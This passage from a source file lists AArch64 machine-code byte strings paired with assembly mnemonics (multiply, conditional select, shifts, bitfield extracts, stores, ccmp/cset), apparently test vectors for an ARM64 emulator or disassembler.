("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x8c\x02\x9b", "msub x0, x1, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\x02\x9b", "mneg x0, x1, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\x00\x00\xf9", "str x5, [x1]"),
("\x26\x04\x00\xf8", "str x6, [x1], #0"),
("\x27\x44\x00\xf8", "str x7, [x1], #4"),
("\x28\x68\x22\xf8", "str x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x1e\xf8", "str x9, [x1], #-30"),
("\x2a\x8c\x00\xf8", "str x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x00\xf9", "str x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\x00\x00\xf9", "str x9, [x1]"),
("\x2a\x00\x00\x39", "strb w10, [x1]"),
("\x2b\x00\x00\x79", "strh w11, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x25\x18\x00\xa9", "stp x5, x6, [x1]"),
("\x27\x20\x80\xa8", "stp x7, x8, [x1], #0"),
("\x29\xa8\x80\xa8", "stp x9, x10, [x1], #8"),
("\x25\x20\x82\xa9", "stp x5, x8, [x1, #32]!"),
("\x26\x1c\x01\xa9", "stp x6, x7, [x1, #16]"),
("\x25\x18\x00\x29", "stp w5, w6, [x1]"),
("\x27\x20\x80\x28", "stp w7, w8, [x1], #0"),
("\x29\x28\x81\x28", "stp w9, w10, [x1], #8"),
("\x25\x20\x84\x29", "stp w5, w8, [x1, #32]!"),
("\x26\x1c\x02\x29", "stp w6, w7, [x1, #16]"),
("\xc1\xbd\x9b\xd2", "movz x1, #0xddee"),
("\x20\x1c\x40\x93", "sxtb x0, x1"),
("\x20\x3c\x40\x93", "sxth x0, x1"),
("\x20\x7c\x40\x93", "sxtw x0, x1"),
("\x20\x1c\x00\x53", "uxtb w0, w1"),
("\x20\x3c\x00\x53", "uxth w0, w1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x00\x82\x9a", "csel x0, x1, x2, eq"),
("\x40\x00\x81\x9a", "csel x0, x2, x1, eq"),
("\x20\x10\x82\x9a", "csel x0, x1, x2, ne"),
("\x40\x10\x81\x9a", "csel x0, x2, x1, ne"),
("\x20\x04\x82\x9a", "csinc x0, x1, x2, eq"),
("\x40\x04\x81\x9a", "csinc x0, x2, x1, eq"),
("\x20\x14\x82\x9a", "csinc x0, x1, x2, ne"),
("\x40\x14\x81\x9a", "csinc x0, x2, x1, ne"),
("\x20\x04\x82\xda", "csneg x0, x1, x2, eq"),
("\x40\x04\x81\xda", "csneg x0, x2, x1, eq"),
("\x20\x14\x82\xda", "csneg x0, x1, x2, ne"),
("\x40\x14\x81\xda", "csneg x0, x2, x1, ne"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x20\xf8\x7f\xd3", "lsl x0, x1, #1"),
("\x20\xf4\x7e\xd3", "lsl x0, x1, #2"),
("\x20\xf0\x7d\xd3", "lsl x0, x1, #3"),
("\x20\xec\x7c\xd3", "lsl x0, x1, #4"),
("\x20\xfc\x41\xd3", "lsr x0, x1, #1"),
("\x20\xfc\x42\xd3", "lsr x0, x1, #2"),
("\x20\xfc\x43\xd3", "lsr x0, x1, #3"),
("\x20\xfc\x44\xd3", "lsr x0, x1, #4"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x20\xc2\x9a", "lsl x0, x1, x2"),
("\x20\x24\xc2\x9a", "lsr x0, x1, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\xa2\x9b", "umaddl x0, w1, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x20\x8c\xa2\x9b", "umsubl x0, w1, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x0c\x22\x9b", "smaddl x0, w1, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x8c\x22\x9b", "smsubl x0, w1, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x22\x9b", "smull x0, w1, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x42\x9b", "smulh x0, x1, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x01\x06\xa0\x92", "movn x1, #0x30, lsl #16"),
("\x02\x02\x80\x92", "movn x2, #16"),
("\x63\xa0\x84\x92", "movn x3, #9475"),
("\x64\xa0\x84\x92", "movn x4, #9475"),
("\xe5\x24\x81\x92", "movn x5, #2343"),
("\xa6\xaf\x81\x92", "movn x6, #3453"),
("\x87\x3a\x82\x92", "movn x7, #4564"),
("\xe8\x16\x84\x92", "movn x8, #8375"),
("\xe9\xc1\x84\x92", "movn x9, #9743"),
("\xea\xaa\x82\x92", "movn x10, #5463"),
("\x2b\xf8\x80\x92", "movn x11, #1985"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\xd3", "ubfx x0, x1, #0, #1"),
("\x20\x08\x40\xd3", "ubfx x0, x1, #0, #3"),
("\x20\x0c\x40\xd3", "ubfx x0, x1, #0, #4"),
("\x20\x10\x40\xd3", "ubfx x0, x1, #0, #5"),
("\x20\x78\x40\xd3", "ubfx x0, x1, #0, #31"),
("\x20\xf8\x40\xd3", "ubfx x0, x1, #0, #63"),
("\x20\xfc\x40\xd3", "ubfx x0, x1, #0, #64"),
("\x20\xfc\x41\xd3", "ubfx x0, x1, #1, #63"),
("\x20\xfc\x42\xd3", "ubfx x0, x1, #2, #62"),
("\x20\xfc\x43\xd3", "ubfx x0, x1, #3, #61"),
("\x20\xfc\x60\xd3", "ubfx x0, x1, #32, #32"),
("\x20\x4c\x4a\xd3", "ubfx x0, x1, #10, #10"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\x93", "sbfx x0, x1, #0, #1"),
("\x20\x08\x40\x93", "sbfx x0, x1, #0, #3"),
("\x20\x0c\x40\x93", "sbfx x0, x1, #0, #4"),
("\x20\x10\x40\x93", "sbfx x0, x1, #0, #5"),
("\x20\x78\x40\x93", "sbfx x0, x1, #0, #31"),
("\x20\xf8\x40\x93", "sbfx x0, x1, #0, #63"),
("\x20\xfc\x40\x93", "sbfx x0, x1, #0, #64"),
("\x20\xfc\x41\x93", "sbfx x0, x1, #1, #63"),
("\x20\xfc\x42\x93", "sbfx x0, x1, #2, #62"),
("\x20\xfc\x43\x93", "sbfx x0, x1, #3, #61"),
("\x20\xfc\x60\x93", "sbfx x0, x1, #32, #32"),
("\x20\x4c\x4a\x93", "sbfx x0, x1, #10, #10"),
("\x20\x48\x49\x93", "sbfx x0, x1, #9, #10"),
("\x20\x40\x47\x93", "sbfx x0, x1, #7, #10"),
("\x20\x3c\x47\x93", "sbfx x0, x1, #7, #9"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
